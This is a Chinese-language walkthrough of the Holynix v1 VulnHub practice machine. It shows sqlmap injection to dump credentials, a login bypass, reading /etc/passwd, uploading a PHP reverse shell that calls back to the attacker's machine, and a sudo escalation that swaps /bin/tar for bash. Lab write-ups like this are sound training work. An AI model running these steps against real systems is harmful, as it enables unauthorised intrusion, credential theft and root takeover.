Holynix-v1打靶渗透(权限提升)

靶机下载地址:Holynix: v1 ~ VulnHub

1. 主机发现+端口扫描+操作系统等信息收集

  1. 确认物理地址

  1. 主机扫描

  1. 端口扫描

  1. 操作系统等信息:

2. 目录扫描

3. web漏洞测试

3.1. 80端口初始页面

3.1.1. Login登录页面

  1. 进入login登录页面

  1. 输入账号密码进行抓包,利用sqlmap进行注入测试

  1. 测试发现存在字符型sql注入

  1. 尝试寻找存贮用户名+密码表【无信息】

  1. 尝试利用sql注入密码,越过审核【万能密码绕过】

  1. 尝试上传文件->权限不足->尝试查看上传的文件

  1. 将文件路径修改为/etc/passwd,点击【Display File】,文件读取成功

  1. 可以根据/etc/passwd这个文件看看有啥其他有bash的账户,可以发现有个用户叫etenenbaum,那么我们尝试SQL注入用这个用户登录

3.1.2. 利用sql注入查询账号密码[etenenbaum:P3n7@g0n0wN3d]

  1. sqlmap -r "test.txt" --dump -dbs –batch

  1. 找到可能的用户信息2

  1. 尝试登录

3.2. 文件上传漏洞

3.2.1. etenenbaum这个用户的权限可以上传文件,那我们试图上传php的反弹shell文件,先构造shell。

locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .
vim php-reverse-shell.php

  1. 修改文件内容,将IP设置为kali的IP,端口改为监端口4444

  1. 用tar czf打包文件 -> 进行上传【记得勾选解压gzip文件】
tar czf shell.tar.gz php-reverse-shell.php

  1. 新开一个窗口,创建一个监听

  1. 上传后访问[kali上的]http://192.168.xxx.xxx/~etenenbaum/页面,发现了上传的文件.

  1. 点击访问shell.tar.zip,查看kali监听窗口 -> 获取shell

4. 权限提升

4.1. SUDO提权

  1. 输入sudo -l 查看允许用户使用的命令
sudo -l # 查看允许用户使用的命令

  1. 切换到/tmp目录下,将/bin/bash文件复制到/tmp目录下
cd /tmp
cp /bin/bash .

  1. 更改文件/tmp/bash的所有权,将所有者改为root
sudo chown root:root/tmp/bash

  1. 将现有的/bin/tar文件备份到bin/tar.bak中 -> 将/tmp/bash文件移动到/bin/tar
sudo mv /bin/tar /bin/tar.bak
sudo mv /tmp/bash /bin/tar

  1. 执行/bin/tar命令,成功提权
sudo /bin/tar

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值